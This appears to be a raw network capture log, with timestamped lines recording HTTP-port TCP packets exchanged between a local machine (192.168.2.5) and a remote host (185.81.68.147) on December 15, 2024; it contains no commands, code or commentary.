                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.725837946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.725872993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.725929976 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.726910114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.726929903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.726952076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.727979898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.728163004 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.728188992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.729197025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.729307890 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.729379892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.729598045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.729620934 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.729659081 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.730488062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.730549097 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.730582952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.731659889 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.731740952 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.731750965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.732886076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.732989073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.733669996 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.733985901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.734074116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.735151052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.735172033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.735198975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.735222101 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.736294985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.736361980 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.736392975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.737517118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.737597942 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.737607002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.738641024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.738715887 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.738728046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.739778042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.739835024 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.739866972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.741048098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.741142035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.741149902 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.742099047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.742173910 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.742204905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.743280888 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.743335962 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.743355989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.744560003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.744631052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.744726896 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.745575905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.745680094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.745707035 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.746737003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.746803999 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.746834993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.747909069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.747994900 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.748027086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.749078989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.749131918 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.749190092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.804771900 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.881275892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.881434917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.881680012 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.881830931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.881943941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.882966995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.882991076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.883073092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.884161949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.884188890 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.884243965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.884557962 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.885359049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.885534048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.886544943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.886639118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.886665106 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.886971951 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.887686014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.887758017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.887948990 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.888798952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.888899088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.889944077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.890222073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.891099930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.891124964 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.891204119 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.892317057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.892339945 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.892416000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.892671108 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.893429041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.893460035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.894592047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.894615889 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.894695044 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.895629883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.895752907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.895869970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.895989895 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.896915913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.897038937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.897222996 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.898086071 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.898185968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.898327112 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.899239063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.899350882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.900542974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.900554895 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.900635004 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.901573896 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.901655912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.901679993 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.901755095 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.902709007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.902823925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.903147936 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.903925896 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.904108047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.905025959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.905055046 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.905148983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.905328989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.906188965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.906332016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.906460047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.907366991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.907479048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.907641888 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.908560991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.908660889 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.908934116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.909671068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.909797907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.909971952 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.910886049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.910998106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.911127090 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.912034988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.912146091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.912230968 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.913167953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.913326025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.913535118 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.914321899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.914428949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.914851904 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.915482044 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.915611982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.916642904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.916670084 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.916758060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.917809963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.917834997 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.917900085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.919066906 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.919092894 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.919158936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.919598103 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.920234919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.920344114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.921384096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.921408892 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.921453953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.922476053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.922498941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.922549009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.923623085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.923645973 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.923727036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.924591064 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.924848080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.924921036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.925952911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.925976992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.926050901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.926146030 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.927104950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.927217007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.928255081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.928380966 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.928565979 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.929430962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.929555893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.929769039 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.930582047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.930699110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.930807114 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.931736946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.931843996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.932029963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.932917118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.933022022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.933346987 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.934109926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.934206963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.934614897 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.935234070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.935343027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.936405897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.936491013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.936846018 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.937586069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.937637091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.938731909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.938858986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.939871073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.939898968 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.939965963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.940069914 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.941050053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.941198111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.941364050 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.942168951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.989424944 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.073654890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.073682070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.073795080 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.074069023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.074145079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.074569941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.075226068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.075324059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.076355934 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.076476097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.076504946 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.076631069 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.077517986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.077646971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.077897072 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.078661919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.078783989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.078866005 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.079842091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.080034971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.080225945 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.081027031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.081125975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.081283092 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.082139015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.082238913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.082328081 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.083349943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.083369017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.083530903 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.084487915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.084588051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.084856033 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.085655928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.085804939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.086241961 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.086786985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.086884022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.086983919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.087956905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.088048935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.088268995 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.089112997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.089255095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.089582920 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.090311050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.090451956 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.090626001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.091444016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.091572046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.091650963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.092674971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.092784882 CET8049708185.81.68.147192.168.2.5
